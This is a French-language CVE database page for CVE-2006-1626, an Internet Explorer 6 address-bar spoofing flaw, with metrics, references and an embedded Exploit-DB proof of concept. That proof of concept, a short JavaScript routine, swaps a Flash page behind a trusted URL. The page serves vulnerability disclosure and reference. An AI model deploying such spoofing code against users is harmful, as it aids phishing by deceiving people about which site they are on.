CVE-2006-1626 : Détail

CVE-2006-1626

A03-Injection
53.05%V4
Network
2006-04-05
08h00 +00:00
2018-10-18
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Internet Explorer 6 for Windows XP SP2 and earlier allows remote attackers to spoof the address bar and possibly conduct phishing attacks by re-opening the window to a malicious Shockwave Flash application, then changing the window location back to a trusted URL while the Flash application is still loading. NOTE: this is a different vulnerability than CVE-2006-1192.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 27577

Date de publication : 2006-04-02 22h00 +00:00
Auteur : Hai Nam Luke
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/17404/info Internet Explorer is prone to address-bar spoofing. An attacker can exploit this issue to display the URI of a trusted and known site in the address bar, while running an attacker-supplied Macromedia Flash application. This may aid in phishing-style attacks and possibly allow access to properties of the trusted domain. <script language="javascript"> function pause(ms) { date = new Date(); var curDate = null; do { var curDate = new Date(); } while(curDate-date < ms); } function spoof () { win = window.open('http://www.microsoft.com/','new') pause (2000) win = window.open('http://www.example.com/swfs/index.swf','new') pause (2000) win = window.open('http://www.microsoft.com/','new') } </script> <a href="javascript: spoof()">Perform the test</a>

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 6.0

Microsoft>>Windows_xp >> Version *

Références

http://www.securityfocus.com/bid/17404
Tags : vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2006/2319
Tags : vdb-entry, x_refsource_VUPEN
http://securitytracker.com/id?1016291
Tags : vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2006/1218
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/19521
Tags : third-party-advisory, x_refsource_SECUNIA